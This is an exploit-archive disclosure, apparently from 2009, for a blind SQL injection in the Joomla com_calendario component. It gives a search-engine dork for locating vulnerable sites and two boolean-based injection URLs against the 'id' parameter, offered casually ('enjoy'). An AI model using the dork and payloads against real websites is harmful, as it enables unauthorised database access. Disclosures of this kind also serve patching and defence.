Joomla Component com_calendario Blind SQL injection Vulnerability

2009-12-28 / 2009-12-29

Credit: Mr.tro0oqy

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Joomla Component com_calendario Blind SQL injection Vulnerability
 
author : Mr.tro0oqy --> yemeni hacker
 
email : t.4@windowslive.com
 
dork: inurl:index.php?option=com_calendario
 
exp :
 
http://www.target.com/index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=1 true
 
http://www.target.com/index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=0 false
 
enjoy ;)

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Joomla Component com_calendario Blind SQL injection Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.